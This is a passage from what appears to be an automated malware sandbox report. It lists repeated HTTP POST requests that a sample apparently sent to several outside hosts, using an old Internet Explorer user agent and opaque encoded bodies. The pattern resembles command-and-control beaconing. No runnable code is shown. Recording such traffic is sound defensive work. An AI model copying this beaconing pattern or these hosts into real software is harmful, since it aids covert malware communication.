74 74 32 4a 41 74 6a 38 46 37 63 32 2f 64 44 6f 47 34 4b 79 49 6e 4c 63 79 39 44 53 33 2b 62 51 37 54 47 34 6e 63 3d Data Ascii: 8peJrRvUVf9BeiWYMnrwHAThGoKhEL25f3e98CnIb3eqEk/Uy1NintjlwuBfpbp1/gPkj6QlTOt4MOba4Vu0T2q7eRQAnEHrMxiJ8FCxvXF6toX3pdi1o9PEqsU/VaQc3IgOzel3KespndQRKg9wsCRMalIxd0+KdjAtWawi2Q2TEWfhQY+CUPlFFxqej6oU48/PbQTAwVbfcZlUAR74ypDkKUZs99qwtN/eTmPbaySqYj9V9G3U5mNuVVE3RoslIRB5BsdRIIvTatlK8+deaqdcIy0vwyQk4xlW0p54C6PJyKWqPW94hRMZLRI2AtcHZ5lrO3Yr5tF4rdPxxKWwKZpPKG7Sp8ICTd2sx4zUc8ZpdZfDIGiJJShJyDVtzHka+G/W0Vo3bfuZgngLmJy93iQpfX29c+PF+I3cvky8Zwn1IaASEhgNBD8pECgBOifVRkWCvwvNfRK1buBaoai3FVQfwPN2e0v8lsH7XDghsEXXuuXjo8USdP/1uGclnkmWDlZze8XVv5CWBaVzGeaGd9QZrtt2JAtj8F7c2/dDoG4KyInLcy9DS3+bQ7TG4nc=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.quadlock.comCache-Control: no-cacheData Raw: 31 2f 65 51 51 44 42 4b 55 76 2f 48 38 67 4a 6b 51 39 66 62 4f 2b 4e 67 7a 50 48 59 62 45 69 62 5a 41 77 32 53 6c 4b 4c 57 47 42 77 39 6b 39 75 69 52 68 49 41 67 71 41 58 51 44 61 43 75 35 4f 58 5a 59 78 46 47 71 41 34 57 66 58 39 67 58 34 62 72 61 6c 52 37 43 47 31 34 6b 72 64 77 48 66 30 6e 37 65 77 54 43 7a 6b 70 58 33 35 66 46 53 48 79 6a 74 47 71 4e 51 49 73 74 6e 4b 6d 77 59 59 56 47 54 36 69 72 4b 4f 6e 57 79 56 6c 6c 68 6d 46 42 50 51 70 54 65 55 78 61 6d 7a 45 6d 33 74 68 63 67 47 2b 64 42 42 54 4e 4a 42 41 42 7a 66 32 52 43 46 54 49 74 34 57 46 42 78 2b 62 45 36 70 55 55 77 69 4b 32 5a 48 70 61 65 4c 31 47 67 4b 62 41 6b 50 43 30 71 79 49 31 4a 2f 6f 68 32 45 37 43 4b 37 63 2b 69 79 49 69 2b 67 39 62 52 64 42 63 4b 62 6a 44 43 37 4c 67 78 6f 70 66 54 48 43 63 4d 53 7a 48 35 79 59 57 61 42 52 65 53 4c 36 2b 69 41 48 6b 4d 55 65 31 6e 62 33 5a 78 52 4b 38 71 67 5a 72 78 63 2b 47 62 75 32 74 39 55 5a 4b 68 56 2f 65 62 74 30 6a 4a 7a 7a 54 75 4b 61 7a 6c 74 6c 6a 62 4f 6b 34 4f 58 42 38 63 32 45 64 6a 55 52 59 77 39 75 4a 76 67 62 77 43 71 78 6e 37 78 70 4b 38 6d 70 6d 50 77 6f 32 46 79 45 73 30 54 4a 36 54 59 46 53 77 2b 52 67 51 68 39 30 4d 66 68 46 58 6e 56 35 30 6d 64 79 69 62 37 39 4b 57 44 43 30 64 4c 72 72 74 77 49 6b 30 49 76 6d 2f 67 78 42 67 39 2f 50 45 69 31 38 56 33 4b 32 4f 43 4d 78 54 61 6e 78 58 73 77 6f 2b 61 56 52 43 4b 4f 33 44 56 7a 55 2b 69 30 71 52 52 5a 74 36 6e 33 54 71 74 61 4e 6d 50 2f 6c 52 68 57 4e 42 36 39 30 6e 4b 57 6e 68 58 63 79 6c 49 6f 63 43 50 48 78 7a 5a 7a 37 61 73 6a 37 32 31 47 4f 53 76 32 41 38 6b 61 4d 67 55 42 7a 73 77 6d 31 4a 68 6e 4f 51 64 66 59 4b 75 34 42 46 78 48 44 6c 2b 4e 32 41 3d 3d Data Ascii: 1/eQQDBKUv/H8gJkQ9fbO+NgzPHYbEibZAw2SlKLWGBw9k9uiRhIAgqAXQDaCu5OXZYxFGqA4WfX9gX4bralR7CG14krdwHf0n7ewTCzkpX35fFSHyjtGqNQIstnKmwYYVGT6irKOnWyVllhmFBPQpTeUxamzEm3thcgG+dBBTNJBABzf2RCFTIt4WFBx+bE6pUUwiK2ZHpaeL1GgKbAkPC0qyI1J/oh2E7CK7c+iyIi+g9bRdBcKbjDC7LgxopfTHCcMSzH5yYWaBReSL6+iAHkMUe1nb3ZxRK8qgZrxc+Gbu2t9UZKhV/ebt0jJzzTuKazltljbOk4OXB8c2EdjURYw9uJvgbwCqxn7xpK8mpmPwo2FyEs0TJ6TYFSw+RgQh90MfhFXnV50mdyib79KWDC0dLrrtwIk0Ivm/gxBg9/PEi18V3K2OCMxTanxXswo+aVRCKO3DVzU+i0qRRZt6n3TqtaNmP/lRhWNB690nKWnhXcylIocCPHxzZz7asj721GOSv2A8kaMgUBzswm1JhnOQdfYKu4BFxHDl+N2A==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pr-park.comCache-Control: no-cacheData Raw: 35 41 73 51 6b 72 62 76 56 50 2f 79 4f 52 76 42 45 61 4d 48 64 46 6e 53 56 79 62 57 2f 33 2b 45 53 76 64 6f 6f 51 54 77 4c 48 39 35 50 2f 42 76 67 4e 37 5a 6c 32 78 6d 78 61 70 32 51 73 42 34 36 6d 79 71 33 6c 66 6d 4d 59 79 4c 7a 4f 41 71 72 52 64 54 50 30 36 75 69 32 45 58 2b 6c 34 48 37 43 79 6c 35 4b 65 54 67 4c 4a 6d 73 46 48 37 63 4b 59 6b 48 70 6d 44 56 61 67 34 53 46 52 5a 78 48 74 76 72 59 6c 55 45 65 41 4c 44 5a 75 79 35 71 44 5a 36 51 75 69 42 44 37 58 42 4a 36 33 59 68 6b 67 74 73 50 57 34 4f 30 6b 33 6c 74 38 59 2b 69 70 5a 76 4b 31 4c 5a 30 51 77 42 6f 55 33 70 71 31 4c 44 57 61 76 4e 67 68 61 55 77 49 77 50 38 4d 4c 65 31 57 71 59 75 49 39 44 63 48 6e 70 48 45 75 63 38 59 66 55 55 79 6b 4d 33 41 33 57 6d 44 51 42 6b 48 77 2f 37 79 4e 30 7a 63 4e 6f 39 67 52 6f 62 42 45 4a 47 69 50 69 42 59 38 2b 67 6e 70 49 58 64 4f 57 66 46 4e 48 67 41 38 34 6e 49 52 30 6d 5a 44 46 59 65 65 46 2f 49 35 55 67 79 7a 50 66 6b 35 6b 72 79 39 57 46 56 49 63 4b 43 37 6a 56 43 68 5a 46 38 70 50 33 34 66 33 71 6c 74 6e 73 54 4a 46 2f 43 4d 65 74 43 7a 50 33 31 6d 56 57 37 34 77 73 2b 6f 48 74 2b 61 74 31 56 6c 6c 42 6a 4f 76 6b 4d 49 4f 37 6b 2b 65 48 46 4b 46 58 30 76 6f 71 74 37 4d 74 45 4a 31 6c 4f 5a 59 7a 71 4b 6a 76 6e 2b 46 4d 44 47 2f 49 2f 2f 4d 70 39 56 56 64 32 64 4d 73 47 30 67 2f 4c 4b 39 71 5a 62 4d 37 58 2b 45 43 52 39 53 75 50 30 34 41 48 71 7a 4d 49 71 33 73 77 42 4d 52 74 66 37 41 7a 64 79 73 46 6c 48 72 6b 35 2b 31 63 70 44 61 72 4e 78 35 5a 2f 57 35 2f 78 52 55 68 35 71 32 68 51 64 33 50 47 66 53 68 36 6b 34 4f 63 63 4f 55 36 45 41 4f 76 37 50 63 79 56 55 5a 62 34 61 42 6b 6e 64 54 4f 45 34 6c 72 63 66 75 47 39 4d 59 35 65 72 5a 70 36 53 34 71 76 51 3d Data Ascii: 5AsQkrbvVP/yORvBEaMHdFnSVybW/3+ESvdooQTwLH95P/BvgN7Zl2xmxap2QsB46myq3lfmMYyLzOAqrRdTP06ui2EX+l4H7Cyl5KeTgLJmsFH7cKYkHpmDVag4SFRZxHtvrYlUEeALDZuy5qDZ6QuiBD7XBJ63YhkgtsPW4O0k3lt8Y+ipZvK1LZ0QwBoU3pq1LDWavNghaUwIwP8MLe1WqYuI9DcHnpHEuc8YfUUykM3A3WmDQBkHw/7yN0zcNo9gRobBEJGiPiBY8+gnpIXdOWfFNHgA84nIR0mZDFYeeF/I5UgyzPfk5kry9WFVIcKC7jVChZF8pP34f3qltnsTJF/CMetCzP31mVW74ws+oHt+at1VllBjOvkMIO7k+eHFKFX0voqt7MtEJ1lOZYzqKjvn+FMDG/I//Mp9VVd2dMsG0g/LK9qZbM7X+ECR9SuP04AHqzMIq3swBMRtf7AzdysFlHrk5+1cpDarNx5Z/W5/xRUh5q2hQd3PGfSh6k4OccOU6EAOv7PcyVUZb4aBkndTOE4lrcfuG9MY5erZp6S4qvQ=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.rs-ag.comCache-Control: no-cacheData Raw: 66 50 36 6e 65 44 45 4e 62 66 2f 62 46 34 45 55 55 43 51 44 38 6f 70 34 77 32 42 76 35 73 49 41 39 61 62 4f 73 7a 2b 4e 5a 75 52 56 4c 39 67 58 44 46 46 52 36 75 65 75 56 6f 72 74 6a 33 37 75 2f 61 6d 6f 70 5a 31 58 54 33 43 33 2f 47 4f 39 56 34 74 71 42 79 4a 45 63 43 2b 35 73 44 34 6d 74 30 4b 6d 30 36 59 55 34 70 54 42 42 49 44 4a 37 71 67 45 72 76 55 59 63 6f 4f 79 30 56 35 59 5a 42 75 62 47 67 30 64 31 38 2b 37 7a 42 75 6e 53 47 78 48 30 61 45 78 65 58 51 30 57 56 4b 2f 38 44 72 6c 35 66 62 64 52 6f 66 56 63 69 67 37 4d 42 79 65 72 62 38 55 31 79 79 4e 49 30 4f 79 4f 75 38 39 78 54 62 6d 56 36 6a 35 38 46 39 43 58 42 35 58 50 33 6d 76 4d 66 2b 57 30 50 70 67 4f 75 4c 36 65 46 6f 44 4f 68 5a 4e 6a 75 41 78 4f 67 5a 71 34 59 51 31 54 68 74 76 49 6e 46 6c 58 52 61 2f 5a 46 42 78 6b 5a 39 36 37 2b 69 6a 6e 37 37 7a 71 62 43 30 49 4b 51 6e 39 35 46 6a 58 39 48 37 76 6a 5a 34 56 43 73 68 45 6e 69 46 4e 41 35 51 33 6e 69 4e 52 44 47 75 78 77 39 6c 6d 61 43 77 65 72 5a 4a 63 47 37 4f 4e 33 4c 4c 31 6e 66 31 61 69 30 31 39 30 6f 54 75 46 2b 73 35 72 4e 47 61 30 6b 73 6d 58 6c 74 2f 4d 67 6d 77 78 43 33 50 68 44 41 4a 59 4f 73 74 35 72 68 4e 71 79 42 61 71 65 34 74 33 2b 6b 59 35 32 72 51 7a 47 73 62 71 4c 41 6b 6f 4d 49 42 77 72 4a 62 31 66 6a 5a 49 45 48 42 73 72 74 62 4c 43 2b 6a 45 59 51 73 69 51 4c 70 4d 65 45 56 65 65 48 6a 56 64 4f 49 56 71 7a 38 45 57 6e 6a 7a 67 75 54 6f 53 39 4f 47 32 2f 76 73 48 45 4c 71 4e 30 5a 75 32 4b 61 52 42 54 42 5a 45 56 42 30 66 58 63 6d 49 33 35 49 61 68 69 58 4a 4c 72 66 4a 70 31 68 6c 34 34 57 35 6c 47 37 6b 49 55 4d 6e 46 53 63 52 6d 66 2f 66 52 74 56 6f 32 72 4c 57 54 39 38 35 52 7a 42 65 64 6f 70 58 57 78 64 4d 5a 49 30 70 68 34 2f 38 51 4f 30 4a 55 49 39 4e 63 Data Ascii: fP6neDENbf/bF4EUUCQD8op4w2Bv5sIA9abOsz+NZuRVL9gXDFFR6ueuVortj37u/amopZ1XT3C3/GO9V4tqByJEcC+5sD4mt0Km06YU4pTBBIDJ7qgErvUYcoOy0V5YZBubGg0d18+7zBunSGxH0aExeXQ0WVK/8Drl5fbdRofVcig7MByerb8U1yyNI0OyOu89xTbmV6j58F9CXB5XP3mvMf+W0PpgOuL6eFoDOhZNjuAxOgZq4YQ1ThtvInFlXRa/ZFBxkZ967+ijn77zqbC0IKQn95FjX9H7vjZ4VCshEniFNA5Q3niNRDGuxw9lmaCwerZJcG7ON3LL1nf1ai0190oTuF+s5rNGa0ksmXlt/MgmwxC3PhDAJYOst5rhNqyBaqe4t3+kY52rQzGsbqLAkoMIBwrJb1fjZIEHBsrtbLC+jEYQsiQLpMeEVeeHjVdOIVqz8EWnjzguToS9OG2/vsHELqN0Zu2KaRBTBZEVB0fXcmI35IahiXJLrfJp1hl44W5lG7kIUMnFScRmf/fRtVo2rLWT985RzBedopXWxdMZI0ph4/8QO0JUI9Nc
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.alteor.clCache-Control: no-cacheData Raw: 51 6a 4e 76 59 7a 2f 39 66 50 39 73 50 33 4f 44 48 75 6e 56 76 63 6a 35 6e 65 71 56 75 6d 65 76 34 7a 67 50 45 30 4f 76 59 54 6a 6f 49 77 75 6c 33 7a 73 39 4f 30 55 51 72 55 77 34 5a 56 33 44 6b 48 39 63 4e 2f 38 41 61 75 2b 61 37 7a 6f 47 76 61 6d 32 39 5a 57 58 7a 6f 6e 59 31 57 62 67 33 2f 4b 50 57 55 6a 59 6c 4f 75 47 69 31 4c 4a 79 6e 32 49 4f 6b 67 4f 59 47 64 42 53 2f 65 74 53 77 39 30 50 54 65 33 75 5a 6d 41 47 68 7a 6d 51 55 4f 33 4f 7a 64 41 6f 6e 37 63 68 79 79 4c 4a 51 51 6b 4c 32 56 6d 4f 30 2b 65 47 38 6c 6e 46 30 42 43 73 41 6d 65 46 44 48 31 56 34 73 57 32 48 66 55 32 66 52 66 4d 54 32 63 2f 55 56 6e 69 5a 6c 31 6b 6c 73 77 6e 62 4e 34 73 37 44 37 73 58 74 55 39 49 72 30 71 50 45 36 62 33 4d 64 72 38 7a 61 70 4f 44 35 35 48 6f 4a 6f 4d 6f 75 34 67 77 6a 49 51 68 6d 65 38 50 5a 43 65 56 31 66 48 35 66 6f 52 62 7a 2b 4f 77 42 66 55 31 6f 74 2f 73 57 76 41 59 42 5a 72 71 59 64 34 37 72 58 32 73 36 32 47 48 79 75 79 4f 4d 63 70 61 44 71 65 64 47 74 72 78 47 35 31 6c 7a 77 59 73 39 62 71 38 6d 72 59 46 78 39 59 78 53 34 6f 6b 49 2b 36 2b 30 31 50 46 31 73 68 47 7a 43 38 7a 43 4a 32 62 64 34 69 4d 6d 32 50 66 47 69 77 5a 6a 69 71 66 7a 38 37 31 36 6d 38 2b 44 2f 36 36 5a 77 4e 6d 43 51 30 4c 7a 48 50 34 52 72 43 62 54 64 6f 51 44 71 4d 78 62 4a 52 73 70 55 76 32 58 6e 4b 54 34 77 4d 37 41 4a 61 4a 33 47 44 41 65 35 63 50 31 68 5a 4d 6e 39 4f 70 74 77 74 63 72 41 6a 76 61 59 6b 77 6c 6d 2f 70 4e 75 42 31 77 6a 75 56 51 6b 76 70 4a 43 50 72 4d 53 70 52 51 47 4b 45 39 69 62 50 4e 38 2f 34 4c 4d 54 4d 6b 73 4c 6f 57 4e 4d 6c 4f 73 6c 6b 71 4b 74 33 38 6b 41 4a 59 4b 74 70 79 2b 63 43 38 4b 79 79 32 2f 4a 6a 57 74 67 78 66 34 6b 52 42 73 6e 5a 69 4d 46 47 69 4e 74 46 51 79 47 37 34 2f 2b 58 6b 2b 34 56 45 39 77 3d 3d Data Ascii: QjNvYz/9fP9sP3ODHunVvcj5neqVumev4zgPE0OvYTjoIwul3zs9O0UQrUw4ZV3DkH9cN/8Aau+a7zoGvam29ZWXzonY1Wbg3/KPWUjYlOuGi1LJyn2IOkgOYGdBS/etSw90PTe3uZmAGhzmQUO3OzdAon7chyyLJQQkL2VmO0+eG8lnF0BCsAmeFDH1V4sW2HfU2fRfMT2c/UVniZl1klswnbN4s7D7sXtU9Ir0qPE6b3Mdr8zapOD55HoJoMou4gwjIQhme8PZCeV1fH5foRbz+OwBfU1ot/sWvAYBZrqYd47rX2s62GHyuyOMcpaDqedGtrxG51lzwYs9bq8mrYFx9YxS4okI+6+01PF1shGzC8zCJ2bd4iMm2PfGiwZjiqfz8716m8+D/66ZwNmCQ0LzHP4RrCbTdoQDqMxbJRspUv2XnKT4wM7AJaJ3GDAe5cP1hZMn9OptwtcrAjvaYkwlm/pNuB1wjuVQkvpJCPrMSpRQGKE9ibPN8/4LMTMksLoWNMlOslkqKt38kAJYKtpy+cC8Kyy2/JjWtgxf4kRBsnZiMFGiNtFQyG74/+Xk+4VE9w==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.valdal.comCache-Control: no-cacheData Raw: 69 35 78 6c 55 44 61 76 68 50 2f 38 42 31 65 6e 6b 56 31 42 4d 4e 6b 35 72 39 4a 57 5a 55 57 5a 79 75 37 41 31 61 38 6a 2b 55 74 49 72 41 56 4e 2f 38 53 6c 30 31 4f 62 79 42 36 67 63 6d 30 48 69 37 4e 76 6e 42 79 37 35 46 6c 55 34 6d 44 48 71 36 33 49 61 71 37 59 37 41 66 7a 34 52 79 47 32 38 4c 78 4e 61 67 34 62 6e 59 34 56 51 6e 69 39 4a 6d 53 49 77 2b 75 78 2b 58 2b 31 4b 61 47 6c 32 6f 73 68 31 6f 66 33 65 44 6e 55 39 39 59 56 56 38 73 6a 72 41 7a 47 62 55 51 74 45 30 36 37 5a 2b 30 44 4b 32 4e 67 79 2b 31 64 62 66 36 69 48 34 6e 32 37 78 2b 52 69 6b 39 34 59 55 4e 61 55 65 78 7a 44 6e 65 71 70 32 54 30 71 61 59 39 77 49 68 53 65 38 66 78 71 5a 6c 34 69 67 64 6d 33 55 67 47 50 51 6a 47 32 55 4e 64 62 37 68 39 42 72 52 44 6a 70 4d 54 2f 4c 4d 56 66 63 45 37 58 6b 4e 71 34 73 34 49 7a 57 69 56 62 4c 59 76 64 2b 2f 35 73 43 4d 65 57 77 78 6c 62 50 69 56 4a 51 74 34 4e 66 67 6e 76 2b 7a 34 73 70 52 44 39 73 77 4c 75 74 46 69 33 56 53 32 37 45 76 78 43 34 36 76 78 42 37 66 66 79 73 46 4c 31 65 35 4a 4f 34 78 30 75 77 65 48 72 77 42 34 71 64 4b 63 64 44 6d 31 66 61 2b 67 6b 61 6c 4e 4f 63 6e 58 44 4e 75 71 35 47 6f 62 70 48 44 66 34 57 44 44 52 72 71 45 59 70 53 66 4e 35 41 64 70 48 4a 54 38 54 76 47 71 42 6f 4c 61 4a 34 32 39 65 57 37 2f 72 4d 6a 2f 6f 5a 69 45 79 58 4f 58 2f 4c 6a 34 4a 45 5a 59 43 31 2f 41 6d 78 75 70 35 31 34 45 54 45 6c 6b 57 47 74 48 67 61 79 53 43 33 59 6c 41 4c 64 67 31 4c 5a 70 45 70 32 57 4c 57 33 45 6b 45 70 52 6a 31 2b 55 47 67 35 67 38 45 66 4e 4d 35 79 52 42 6a 58 38 36 46 6b 51 4b 6b 62 53 6a 37 2b 38 47 64 50 4f 64 48 64 41 64 50 47 6f 4d 4e 6f 6b 77 30 6d 63 75 45 62 2b 2f 64 4f 48 44 50 5a 65 45 61 47 45 32 73 74 35 56 57 36 4c 33 55 4f 59 3d Data Ascii: i5xlUDavhP/8B1enkV1BMNk5r9JWZUWZyu7A1a8j+UtIrAVN/8Sl01ObyB6gcm0Hi7NvnBy75FlU4mDHq63Iaq7Y7Afz4RyG28LxNag4bnY4VQni9JmSIw+ux+X+1KaGl2osh1of3eDnU99YVV8sjrAzGbUQtE067Z+0DK2Ngy+1dbf6iH4n27x+Rik94YUNaUexzDneqp2T0qaY9wIhSe8fxqZl4igdm3UgGPQjG2UNdb7h9BrRDjpMT/LMVfcE7XkNq4s4IzWiVbLYvd+/5sCMeWwxlbPiVJQt4Nfgnv+z4spRD9swLutFi3VS27EvxC46vxB7ffysFL1e5JO4x0uweHrwB4qdKcdDm1fa+gkalNOcnXDNuq5GobpHDf4WDDRrqEYpSfN5AdpHJT8TvGqBoLaJ429eW7/rMj/oZiEyXOX/Lj4JEZYC1/Amxup514ETElkWGtHgaySC3YlALdg1LZpEp2WLW3EkEpRj1+UGg5g8EfNM5yRBjX86FkQKkbSj7+8GdPOdHdAdPGoMNokw0mcuEb+/dOHDPZeEaGE2st5VW6L3UOY=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pdqhomes.comCache-Control: no-cacheData Raw: 68 49 56 38 43 70 65 49 55 50 39 4f 79 35 30 32 68 67 32 78 6f 4f 43 61 6d 44 62 4e 4e 42 47 39 75 31 55 31 30 61 76 46 54 66 64 78 34 58 4f 43 45 61 6e 71 45 72 45 62 44 68 74 54 76 6e 61 61 50 6f 69 50 35 50 51 74 58 2b 69 54 62 70 55 79 52 75 44 51 68 64 57 6c 4c 6d 46 41 32 36 7a 33 77 46 46 77 67 46 77 4d 34 2f 58 62 77 72 68 31 73 33 79 4d 6d 54 55 45 67 71 74 4e 4f 68 39 43 54 6b 44 67 74 78 58 6a 61 4c 42 66 79 2b 6b 59 72 6a 6b 76 36 62 4a 4a 32 4e 62 68 79 6d 63 74 2f 49 4d 69 36 57 65 68 6e 62 57 66 33 6f 63 4b 64 77 63 6d 45 70 49 6a 33 70 62 68 6f 6c 64 44 46 76 74 75 6c 6d 48 30 79 63 70 49 79 54 4a 4c 2f 45 75 41 79 43 34 4a 34 79 30 64 63 71 4b 33 4c 6c 38 32 56 77 46 58 47 46 54 36 37 76 54 6b 51 61 6d 30 62 6e 47 7a 31 51 5a 76 51 36 57 68 68 73 30 72 35 44 6b 54 42 43 6e 43 7a 6e 49 72 79 34 78 4c 70 5a 55 50 33 58 6a 76 4b 46 64 53 76 45 78 33 44 6c 32 67 64 75 58 75 42 41 72 58 64 53 52 52 6a 64 78 4e 6b 73 78 63 63 79 2f 67 67 6f 4d 4d 55 72 48 5a 52 57 68 57 62 51 52 2b 34 4c 78 5a 36 56 64 77 35 66 77 4e 6e 52 69 6b 39 53 72 71 4c 66 49 69 52 45 75 74 64 64 35 37 52 32 42 78 48 71 33 4d 2f 34 72 6d 48 4d 70 44 2f 6a 39 65 45 69 4a 6c 57 4e 42 6b 69 6e 37 70 58 46 4c 7a 2f 4f 4d 45 34 70 54 63 78 6f 76 4f 76 64 51 52 4b 36 54 71 33 4c 62 46 30 41 61 38 73 6e 71 67 6d 6d 49 4a 70 7a 65 67 49 31 36 52 69 6a 47 34 51 67 65 37 2b 52 6f 6b 56 2b 33 67 34 45 6f 78 2f 4e 54 41 4f 45 55 68 67 67 36 4e 78 4d 58 6e 46 2f 66 47 4a 6e 32 30 50 4a 46 38 35 31 68 5a 2f 43 38 58 4c 59 79 52 32 55 70 54 36 57 53 42 37 56 7a 2f 41 36 6c 75 49 58 66 2f 69 4b 64 38 33 2b 6f 4a 51 61 38 34 36 42 6b 2b 39 41 4f 69 71 69 48 62 36 6c 31 36 65 4f 6d 6d 69 77 3d 3d Data Ascii: hIV8CpeIUP9Oy502hg2xoOCamDbNNBG9u1U10avFTfdx4XOCEanqErEbDhtTvnaaPoiP5PQtX+iTbpUyRuDQhdWlLmFA26z3wFFwgFwM4/Xbwrh1s3yMmTUEgqtNOh9CTkDgtxXjaLBfy+kYrjkv6bJJ2Nbhymct/IMi6WehnbWf3ocKdwcmEpIj3pbholdDFvtulmH0ycpIyTJL/EuAyC4J4y0dcqK3Ll82VwFXGFT67vTkQam0bnGz1QZvQ6Whhs0r5DkTBCnCznIry4xLpZUP3XjvKFdSvEx3Dl2gduXuBArXdSRRjdxNksxccy/ggoMMUrHZRWhWbQR+4LxZ6Vdw5fwNnRik9SrqLfIiREutdd57R2BxHq3M/4rmHMpD/j9eEiJlWNBkin7pXFLz/OME4pTcxovOvdQRK6Tq3LbF0Aa8snqgmmIJpzegI16RijG4Qge7+RokV+3g4Eox/NTAOEUhgg6NxMXnF/fGJn20PJF851hZ/C8XLYyR2UpT6WSB7Vz/A6luIXf/iKd83+oJQa846Bk+9AOiqiHb6l16eOmmiw==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.valdal.comCache-Control: no-cacheData Raw: 69 35 78 6c 55 44 61 76 68 50 2f 38 42 31 65 6e 6b 56 31 42 4d 4e 6b 35 72 39 4a 57 5a 55 57 5a 79 75 37 41 31 61 38 6a 2b 55 74 49 72 41 56 4e 2f 38 53 6c 30 31 4f 62 79 42 36 67 63 6d 30 48 69 37 4e 76 6e 42 79 37 35 46 6c 55 34 6d 44 48 71 36 33 49 61 71 37 59 37 41 66 7a 34 52 79 47 32 38 4c 78 4e 61 67 34 62 6e 59 34 56 51 6e 69 39 4a 6d 53 49 77 2b 75 78 2b 58 2b 31 4b 61 47 6c 32 6f 73 68 31 6f 66 33 65 44 6e 55 39 39 59 56 56 38 73 6a 72 41 7a 47 62 55 51 74 45 30 36 37 5a 2b 30 44 4b 32 4e 67 79 2b 31 64 62 66 36 69 48 34 6e 32 37 78 2b 52 69 6b 39 34 59 55 4e 61 55 65 78 7a 44 6e 65 71 70 32 54 30 71 61 59 39 77 49 68 53 65 38 66 78 71 5a 6c 34 69 67 64 6d 33 55 67 47 50 51 6a 47 32 55 4e 64 62 37 68 39 42 72 52 44 6a 70 4d 54 2f 4c 4d 56 66 63 45 37 58 6b 4e 71 34 73 34 49 7a 57 69 56 62 4c 59 76 64 2b 2f 35 73 43 4d 65 57 77 78 6c 62 50 69 56 4a 51 74 34 4e 66 67 6e 76 2b 7a 34 73 70 52 44 39 73 77 4c 75 74 46 69 33 56 53 32 37 45 76 78 43 34 36 76 78 42 37 66 66 79 73 46 4c 31 65 35 4a 4f 34 78 30 75 77 65 48 72 77 42 34 71 64 4b 63 64 44 6d 31 66 61 2b 67 6b 61 6c 4e 4f 63 6e 58 44 4e 75 71 35 47 6f 62 70 48 44 66 34 57 44 44 52 72 71 45 59 70 53 66 4e 35 41 64 70 48 4a 54 38 54 76 47 71 42 6f 4c 61 4a 34 32 39 65 57 37 2f 72 4d 6a 2f 6f 5a 69 45 79 58 4f 58 2f 4c 6a 34 4a 45 5a 59 43 31 2f 41 6d 78 75 70 35 31 34 45 54 45 6c 6b 57 47 74 48 67 61 79 53 43 33 59 6c 41 4c 64 67 31 4c 5a 70 45 70 32 57 4c 57 33 45 6b 45 70 52 6a 31 2b 55 47 67 35 67 38 45 66 4e 4d 35 79 52 42 6a 58 38 36 46 6b 51 4b 6b 62 53 6a 37 2b 38 47 64 50 4f 64 48 64 41 64 50 47 6f 4d 4e 6f 6b 77 30 6d 63 75 45 62 2b 2f 64 4f 48 44 50 5a 65 45 61 47 45 32 73 74 35 56 57 36 4c 33 55 4f 59 3d Data Ascii: i5xlUDavhP/8B1enkV1BMNk5r9JWZUWZyu7A1a8j+UtIrAVN/8Sl01ObyB6gcm0Hi7NvnBy75FlU4mDHq63Iaq7Y7Afz4RyG28LxNag4bnY4VQni9JmSIw+ux+X+1KaGl2osh1of3eDnU99YVV8sjrAzGbUQtE067Z+0DK2Ngy+1dbf6iH4n27x+Rik94YUNaUexzDneqp2T0qaY9wIhSe8fxqZl4igdm3UgGPQjG2UNdb7h9BrRDjpMT/LMVfcE7XkNq4s4IzWiVbLYvd+/5sCMeWwxlbPiVJQt4Nfgnv+z4spRD9swLutFi3VS27EvxC46vxB7ffysFL1e5JO4x0uweHrwB4qdKcdDm1fa+gkalNOcnXDNuq5GobpHDf4WDDRrqEYpSfN5AdpHJT8TvGqBoLaJ429eW7/rMj/oZiEyXOX/Lj4JEZYC1/Amxup514ETElkWGtHgaySC3YlALdg1LZpEp2WLW3EkEpRj1+UGg5g8EfNM5yRBjX86FkQKkbSj7+8GdPOdHdAdPGoMNokw0mcuEb+/dOHDPZeEaGE2st5VW6L3UOY=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.depalo.comCache-Control: no-cacheData Raw: 39 33 46 6d 66 7a 61 47 6a 76 38 50 4c 63 53 30 6b 55 68 72 47 39 6b 6f 63 6d 70 57 57 47 56 51 79 72 56 55 57 2f 4b 34 6c 6a 37 41 69 48 47 75 34 71 49 73 6b 4f 70 36 59 36 36 4f 41 48 64 62 4f 76 48 79 4c 75 76 48 6f 56 75 59 54 67 38 71 53 49 75 77 6b 38 33 2f 59 36 34 39 39 38 2b 66 6f 4c 59 57 59 52 41 74 33 44 41 68 65 70 4c 68 52 46 62 65 78 6b 79 7a 4c 6b 63 6b 50 6c 46 75 2b 53 70 7a 77 73 31 4c 6a 69 45 6f 6a 34 64 68 64 2b 75 4e 77 63 34 2b 5a 51 32 71 6c 6e 59 44 63 36 79 42 6c 4e 76 30 55 35 30 51 48 34 2f 4c 39 6f 33 6e 33 42 5a 75 4e 66 44 33 64 42 74 73 58 48 76 32 2f 74 